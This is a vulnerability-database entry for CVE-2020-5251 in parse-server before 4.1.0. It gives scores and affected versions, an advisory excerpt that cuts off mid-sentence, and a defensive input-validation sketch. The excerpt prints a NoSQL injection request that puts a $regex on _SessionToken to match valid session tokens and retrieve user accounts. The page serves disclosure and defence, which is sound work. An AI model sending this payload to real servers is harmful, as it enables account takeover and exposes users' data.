CVE-2020-5251
Published: 2020-03-04
Priority: P4, 25, medium; 5.3 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
EPSS: 0.85% (53.5th percentile)
In parse-server before version 4.1.0, you can fetch all the users' objects by using a regex in the NoSQL query. A regex on sessionToken can be used to find valid accounts this way.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| parse-community | parse-server | < 4.1.0 | 4.1.0 |
| parse-community | parse-server | >= 0 < 4.1.0 | 4.1.0 |
| parseplatform | parse-server | < 4.1.0 | 4.1.0 |
CVSS provenance
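| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 5.3 | MEDIUM | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N |
| nvd | v2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:P/I:N/A:N |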
OSV
Information disclosure in parse-server
osv·2020-03-04
CVE-2020-5251 [HIGH] Information disclosure in parse-server
1. You can fetch all the users' objects by using regex in the NoSQL query.
Using the NoSQL, you can use a regex on sessionToken `("_SessionToken":{"$regex":"r:027f"})` and find valid accounts this way.
Using this method, it's possible to retrieve accounts without interaction from the users.
GET /parse/users/me HTTP/1.1
```
{
  "_ApplicationId": "appName",
  "_JavaScriptKey": "javascriptkey",
  "_ClientVersion": "js2.10.0",
  "_InstallationId": "ca713ee2-6e60-d023-a8fe-14e1bfb2f300",
  "_SessionToken": {
    "$regex": "r:5"
  }
}
```
When trying it with an update query the same thing luckily doesn't seem to work:
POST /parse/classes/_User/PPNk59jPPZ
2. There is another similar vulnerability in verify email and the request password reset.
If you sign up with some
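The request in item 1 works because an object is accepted where a string session token is expected, so the object reaches the database as a query operator. As an added example (not parse-server code, and not the fix from the commit listed on this page), the following sketch rejects any credential field that is not a plain string before it is used in a lookup; the function names and the Express-style wiring are assumptions.

```javascript
// Added example, not parse-server code. Field names come from the request
// body shown above; everything else here is hypothetical.
const STRING_ONLY_FIELDS = [
  "_SessionToken", "_ApplicationId", "_JavaScriptKey", "_InstallationId",
];

// Collect the path of every key that starts with "$" (a MongoDB operator).
function findOperators(value, path) {
  if (value === null || typeof value !== "object") return [];
  const hits = [];
  for (const [key, child] of Object.entries(value)) {
    const here = `${path}.${key}`;
    if (key.startsWith("$")) hits.push(here);
    hits.push(...findOperators(child, here));
  }
  return hits;
}

// Return one message per credential field that is not a plain string.
function checkCredentialFields(body) {
  if (body === null || typeof body !== "object") return [];
  const problems = [];
  for (const field of STRING_ONLY_FIELDS) {
    if (!Object.prototype.hasOwnProperty.call(body, field)) continue;
    const value = body[field];
    if (typeof value === "string") continue;
    const ops = findOperators(value, field);
    problems.push(ops.length
      ? `${field}: query operator at ${ops.join(", ")}`
      : `${field}: expected string, got ${typeof value}`);
  }
  return problems;
}

// Express-style middleware (hypothetical wiring): reject before any lookup.
function rejectNonStringCredentials(req, res, next) {
  const problems = checkCredentialFields(req.body);
  if (problems.length === 0) return next();
  res.statusCode = 400;
  res.end(JSON.stringify({ error: "invalid credential field", problems }));
}

// Constructed inputs: the body from the advisory, and a normal string token.
const advisoryBody = { _ApplicationId: "appName", _SessionToken: { $regex: "r:5" } };
const normalBody = { _ApplicationId: "appName", _SessionToken: "r:constructed" };
console.log(checkCredentialFields(advisoryBody));
console.log(checkCredentialFields(normalBody));
```

The same check can be run over logged request bodies to find earlier requests that carried an operator object in a credential field.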
GHSA
Information disclosure in parse-server
ghsa·2020-03-04
CVE-2020-5251 [HIGH] CWE-200 Information disclosure in parse-server
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
https://github.com/parse-community/parse-server/commit/3a3a5eee5ffa48da1352423312cb767de14de269
https://github.com/parse-community/parse-server/security/advisories/GHSA-h4mf-75hf-67w4
2020-03-04
Published